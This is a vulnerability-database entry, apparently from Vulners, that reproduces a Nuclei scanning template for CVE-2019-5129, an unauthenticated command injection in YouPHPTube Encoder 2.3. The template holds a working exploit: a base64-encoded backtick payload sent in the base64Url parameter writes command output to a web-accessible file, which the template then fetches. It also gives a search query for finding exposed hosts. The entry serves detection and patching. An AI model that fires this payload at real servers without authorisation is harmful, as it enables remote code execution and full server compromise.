Lucene search
K

YouPHPTube Encoder 2.3 - Command Injection

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Critical command injection vulnerability found in YouPHPTube Encoder 2.3 affecting unauthenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-5129
29 Jan 202409:41
circl
CNVD
YouPHPTube Encoder Operating System Command Injection Vulnerability
21 Oct 201900:00
cnvd
Check Point Advisories
YouPHPTube Encoder Command Injection (CVE-2019-5127; CVE-2019-5128; CVE-2019-5129)
25 Feb 202000:00
checkpoint_advisories
CVE
CVE-2019-5129
25 Oct 201917:12
cve
Cvelist
CVE-2019-5129
25 Oct 201917:12
cvelist
NVD
CVE-2019-5129
25 Oct 201918:15
nvd
OSV
CVE-2019-5129
25 Oct 201918:15
osv
Prion
Command injection
25 Oct 201918:15
prion
RedhatCVE
CVE-2019-5129
5 Feb 202517:57
redhatcve
Talos
YouPHPTube Encoder base64Url multiple command injections
17 Oct 201900:00
talos
Rows per page
id: CVE-2019-5129

info:
  name: YouPHPTube Encoder 2.3 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube.The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands through command injection, leading to complete server compromise and potential access to all media content.
  remediation: |
    Upgrade to YouPHPTube Encoder version 2.4 or later, or apply vendor-provided security patches.
  reference:
    - https://xz.aliyun.com/news/6312
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-5129
    cwe-id: CWE-78
    epss-score: 0.33157
    epss-percentile: 0.98151
    cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: youphptube
    product: youphptube_encoder
    fofa-query: icon_hash="-276846707"
  tags: cve,cve2019,youphptube,rce,encoder,vkev,vuln

variables:
  file_name: "{{rand_text_alpha(4)}}.txt"
  content: "id"
  payload: '{{base64(concat("`", content, " > ", file_name, "`"))}}'

http:
  - raw:
      - |
        GET /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /objects/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210086bbf9f888b315f73509d0b6ca4acec2a27ba0eb88baa6c4447fd3178bcbadba02210080ae2951853896fb8d4738a7aa11e70ea878f0b8278b5a417050e50dc1c24c9b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
CVSS 310
EPSS0.33157
33